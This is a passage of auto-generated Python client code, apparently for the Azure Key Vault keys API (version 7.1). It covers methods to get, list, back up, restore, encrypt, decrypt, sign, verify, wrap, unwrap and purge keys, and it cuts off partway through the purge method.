:param key_name: The name of the key to get.
:type key_name: str
:param key_version: Adding the version parameter retrieves a specific version of a key. This
URI fragment is optional. If not specified, the latest version of the key is returned.
:type key_version: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.KeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
request = build_get_key_request(
key_name=key_name,
key_version=key_version,
api_version=api_version,
template_url=self.get_key.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_key.metadata = {'url': '/keys/{key-name}/{key-version}'} # type: ignore
@distributed_trace
def get_key_versions(
self,
vault_base_url, # type: str
key_name, # type: str
maxresults=None, # type: Optional[int]
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.KeyListResult"]
"""Retrieves a list of individual key versions with the same key name.
The full key identifier, attributes, and tags are provided in the response. This operation
requires the keys/list permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param maxresults: Maximum number of results to return in a page. If not specified the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either KeyListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.keyvault.v7_1.models.KeyListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
api_version = kwargs.pop('api_version', "7.1") # type: str
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_get_key_versions_request(
key_name=key_name,
api_version=api_version,
maxresults=maxresults,
template_url=self.get_key_versions.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
else:
request = build_get_key_versions_request(
key_name=key_name,
api_version=api_version,
maxresults=maxresults,
template_url=next_link,
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("KeyListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
get_key_versions.metadata = {'url': '/keys/{key-name}/versions'} # type: ignore
@distributed_trace
def get_keys(
self,
vault_base_url, # type: str
maxresults=None, # type: Optional[int]
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.KeyListResult"]
"""List keys in the specified vault.
Retrieves a list of the keys in the Key Vault as JSON Web Key structures that contain the
public part of a stored key. The LIST operation is applicable to all key types, however only
the base key identifier, attributes, and tags are provided in the response. Individual versions
of a key are not listed in the response. This operation requires the keys/list permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param maxresults: Maximum number of results to return in a page. If not specified the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either KeyListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.keyvault.v7_1.models.KeyListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
api_version = kwargs.pop('api_version', "7.1") # type: str
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_get_keys_request(
api_version=api_version,
maxresults=maxresults,
template_url=self.get_keys.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
else:
request = build_get_keys_request(
api_version=api_version,
maxresults=maxresults,
template_url=next_link,
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("KeyListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
get_keys.metadata = {'url': '/keys'} # type: ignore
@distributed_trace
def backup_key(
self,
vault_base_url, # type: str
key_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.BackupKeyResult"
"""Requests that a backup of the specified key be downloaded to the client.
The Key Backup operation exports a key from Azure Key Vault in a protected form. Note that this
operation does NOT return key material in a form that can be used outside the Azure Key Vault
system, the returned key material is either protected to a Azure Key Vault HSM or to Azure Key
Vault itself. The intent of this operation is to allow a client to GENERATE a key in one Azure
Key Vault instance, BACKUP the key, and then RESTORE it into another Azure Key Vault instance.
The BACKUP operation may be used to export, in protected form, any key type from Azure Key
Vault. Individual versions of a key cannot be backed up. BACKUP / RESTORE can be performed
within geographical boundaries only; meaning that a BACKUP from one geographical area cannot be
restored to another geographical area. For example, a backup from the US geographical area
cannot be restored in an EU geographical area. This operation requires the key/backup
permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: BackupKeyResult, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.BackupKeyResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.BackupKeyResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
request = build_backup_key_request(
key_name=key_name,
api_version=api_version,
template_url=self.backup_key.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('BackupKeyResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
backup_key.metadata = {'url': '/keys/{key-name}/backup'} # type: ignore
@distributed_trace
def restore_key(
self,
vault_base_url, # type: str
parameters, # type: "_models.KeyRestoreParameters"
**kwargs # type: Any
):
# type: (...) -> "_models.KeyBundle"
"""Restores a backed up key to a vault.
Imports a previously backed up key into Azure Key Vault, restoring the key, its key identifier,
attributes and access control policies. The RESTORE operation may be used to import a
previously backed up key. Individual versions of a key cannot be restored. The key is restored
in its entirety with the same key name as it had when it was backed up. If the key name is not
available in the target Key Vault, the RESTORE operation will be rejected. While the key name
is retained during restore, the final key identifier will change if the key is restored to a
different vault. Restore will restore all versions and preserve version identifiers. The
RESTORE operation is subject to security constraints: The target Key Vault must be owned by the
same Microsoft Azure Subscription as the source Key Vault The user must have RESTORE permission
in the target Key Vault. This operation requires the keys/restore permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param parameters: The parameters to restore the key.
:type parameters: ~azure.keyvault.v7_1.models.KeyRestoreParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.KeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'KeyRestoreParameters')
request = build_restore_key_request(
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.restore_key.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
restore_key.metadata = {'url': '/keys/restore'} # type: ignore
@distributed_trace
def encrypt(
self,
vault_base_url, # type: str
key_name, # type: str
key_version, # type: str
parameters, # type: "_models.KeyOperationsParameters"
**kwargs # type: Any
):
# type: (...) -> "_models.KeyOperationResult"
"""Encrypts an arbitrary sequence of bytes using an encryption key that is stored in a key vault.
The ENCRYPT operation encrypts an arbitrary sequence of bytes using an encryption key that is
stored in Azure Key Vault. Note that the ENCRYPT operation only supports a single block of
data, the size of which is dependent on the target key and the encryption algorithm to be used.
The ENCRYPT operation is only strictly necessary for symmetric keys stored in Azure Key Vault
since protection with an asymmetric key can be performed using public portion of the key. This
operation is supported for asymmetric keys as a convenience for callers that have a
key-reference but do not have access to the public key material. This operation requires the
keys/encrypt permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param key_version: The version of the key.
:type key_version: str
:param parameters: The parameters for the encryption operation.
:type parameters: ~azure.keyvault.v7_1.models.KeyOperationsParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyOperationResult, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.KeyOperationResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyOperationResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'KeyOperationsParameters')
request = build_encrypt_request(
key_name=key_name,
key_version=key_version,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.encrypt.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
encrypt.metadata = {'url': '/keys/{key-name}/{key-version}/encrypt'} # type: ignore
@distributed_trace
def decrypt(
self,
vault_base_url, # type: str
key_name, # type: str
key_version, # type: str
parameters, # type: "_models.KeyOperationsParameters"
**kwargs # type: Any
):
# type: (...) -> "_models.KeyOperationResult"
"""Decrypts a single block of encrypted data.
The DECRYPT operation decrypts a well-formed block of ciphertext using the target encryption
key and specified algorithm. This operation is the reverse of the ENCRYPT operation; only a
single block of data may be decrypted, the size of this block is dependent on the target key
and the algorithm to be used. The DECRYPT operation applies to asymmetric and symmetric keys
stored in Azure Key Vault since it uses the private portion of the key. This operation requires
the keys/decrypt permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param key_version: The version of the key.
:type key_version: str
:param parameters: The parameters for the decryption operation.
:type parameters: ~azure.keyvault.v7_1.models.KeyOperationsParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyOperationResult, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.KeyOperationResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyOperationResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'KeyOperationsParameters')
request = build_decrypt_request(
key_name=key_name,
key_version=key_version,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.decrypt.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
decrypt.metadata = {'url': '/keys/{key-name}/{key-version}/decrypt'} # type: ignore
@distributed_trace
def sign(
self,
vault_base_url, # type: str
key_name, # type: str
key_version, # type: str
parameters, # type: "_models.KeySignParameters"
**kwargs # type: Any
):
# type: (...) -> "_models.KeyOperationResult"
"""Creates a signature from a digest using the specified key.
The SIGN operation is applicable to asymmetric and symmetric keys stored in Azure Key Vault
since this operation uses the private portion of the key. This operation requires the keys/sign
permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param key_version: The version of the key.
:type key_version: str
:param parameters: The parameters for the signing operation.
:type parameters: ~azure.keyvault.v7_1.models.KeySignParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyOperationResult, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.KeyOperationResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyOperationResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'KeySignParameters')
request = build_sign_request(
key_name=key_name,
key_version=key_version,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.sign.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
sign.metadata = {'url': '/keys/{key-name}/{key-version}/sign'} # type: ignore
@distributed_trace
def verify(
self,
vault_base_url, # type: str
key_name, # type: str
key_version, # type: str
parameters, # type: "_models.KeyVerifyParameters"
**kwargs # type: Any
):
# type: (...) -> "_models.KeyVerifyResult"
"""Verifies a signature using a specified key.
The VERIFY operation is applicable to symmetric keys stored in Azure Key Vault. VERIFY is not
strictly necessary for asymmetric keys stored in Azure Key Vault since signature verification
can be performed using the public portion of the key but this operation is supported as a
convenience for callers that only have a key-reference and not the public portion of the key.
This operation requires the keys/verify permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param key_version: The version of the key.
:type key_version: str
:param parameters: The parameters for verify operations.
:type parameters: ~azure.keyvault.v7_1.models.KeyVerifyParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyVerifyResult, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.KeyVerifyResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyVerifyResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'KeyVerifyParameters')
request = build_verify_request(
key_name=key_name,
key_version=key_version,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.verify.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyVerifyResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
verify.metadata = {'url': '/keys/{key-name}/{key-version}/verify'} # type: ignore
@distributed_trace
def wrap_key(
self,
vault_base_url, # type: str
key_name, # type: str
key_version, # type: str
parameters, # type: "_models.KeyOperationsParameters"
**kwargs # type: Any
):
# type: (...) -> "_models.KeyOperationResult"
"""Wraps a symmetric key using a specified key.
The WRAP operation supports encryption of a symmetric key using a key encryption key that has
previously been stored in an Azure Key Vault. The WRAP operation is only strictly necessary for
symmetric keys stored in Azure Key Vault since protection with an asymmetric key can be
performed using the public portion of the key. This operation is supported for asymmetric keys
as a convenience for callers that have a key-reference but do not have access to the public key
material. This operation requires the keys/wrapKey permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param key_version: The version of the key.
:type key_version: str
:param parameters: The parameters for wrap operation.
:type parameters: ~azure.keyvault.v7_1.models.KeyOperationsParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyOperationResult, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.KeyOperationResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyOperationResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'KeyOperationsParameters')
request = build_wrap_key_request(
key_name=key_name,
key_version=key_version,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.wrap_key.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
wrap_key.metadata = {'url': '/keys/{key-name}/{key-version}/wrapkey'} # type: ignore
@distributed_trace
def unwrap_key(
self,
vault_base_url, # type: str
key_name, # type: str
key_version, # type: str
parameters, # type: "_models.KeyOperationsParameters"
**kwargs # type: Any
):
# type: (...) -> "_models.KeyOperationResult"
"""Unwraps a symmetric key using the specified key that was initially used for wrapping that key.
The UNWRAP operation supports decryption of a symmetric key using the target key encryption
key. This operation is the reverse of the WRAP operation. The UNWRAP operation applies to
asymmetric and symmetric keys stored in Azure Key Vault since it uses the private portion of
the key. This operation requires the keys/unwrapKey permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param key_version: The version of the key.
:type key_version: str
:param parameters: The parameters for the key operation.
:type parameters: ~azure.keyvault.v7_1.models.KeyOperationsParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyOperationResult, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.KeyOperationResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyOperationResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'KeyOperationsParameters')
request = build_unwrap_key_request(
key_name=key_name,
key_version=key_version,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.unwrap_key.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
unwrap_key.metadata = {'url': '/keys/{key-name}/{key-version}/unwrapkey'} # type: ignore
@distributed_trace
def get_deleted_keys(
self,
vault_base_url, # type: str
maxresults=None, # type: Optional[int]
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.DeletedKeyListResult"]
"""Lists the deleted keys in the specified vault.
Retrieves a list of the keys in the Key Vault as JSON Web Key structures that contain the
public part of a deleted key. This operation includes deletion-specific information. The Get
Deleted Keys operation is applicable for vaults enabled for soft-delete. While the operation
can be invoked on any vault, it will return an error if invoked on a non soft-delete enabled
vault. This operation requires the keys/list permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param maxresults: Maximum number of results to return in a page. If not specified the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DeletedKeyListResult or the result of
cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.keyvault.v7_1.models.DeletedKeyListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
api_version = kwargs.pop('api_version', "7.1") # type: str
cls = kwargs.pop('cls', None) # type: ClsType["_models.DeletedKeyListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_get_deleted_keys_request(
api_version=api_version,
maxresults=maxresults,
template_url=self.get_deleted_keys.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
else:
request = build_get_deleted_keys_request(
api_version=api_version,
maxresults=maxresults,
template_url=next_link,
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("DeletedKeyListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
get_deleted_keys.metadata = {'url': '/deletedkeys'} # type: ignore
@distributed_trace
def get_deleted_key(
self,
vault_base_url, # type: str
key_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.DeletedKeyBundle"
"""Gets the public part of a deleted key.
The Get Deleted Key operation is applicable for soft-delete enabled vaults. While the operation
can be invoked on any vault, it will return an error if invoked on a non soft-delete enabled
vault. This operation requires the keys/get permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DeletedKeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.DeletedKeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DeletedKeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
request = build_get_deleted_key_request(
key_name=key_name,
api_version=api_version,
template_url=self.get_deleted_key.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('DeletedKeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_deleted_key.metadata = {'url': '/deletedkeys/{key-name}'} # type: ignore
@distributed_trace
def purge_deleted_key(
self,
vault_base_url, # type: str
key_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""Permanently deletes the specified key.
The Purge Deleted Key operation is applicable for soft-delete enabled vaults. While the
operation can be invoked on any vault, it will return an error if invoked on a non soft-delete
enabled vault. This operation requires the keys/purge permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
request = build_purge_deleted_key_request(
key_name=key_name,
api_version=api_version,
template_url=self.purge_deleted_key.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
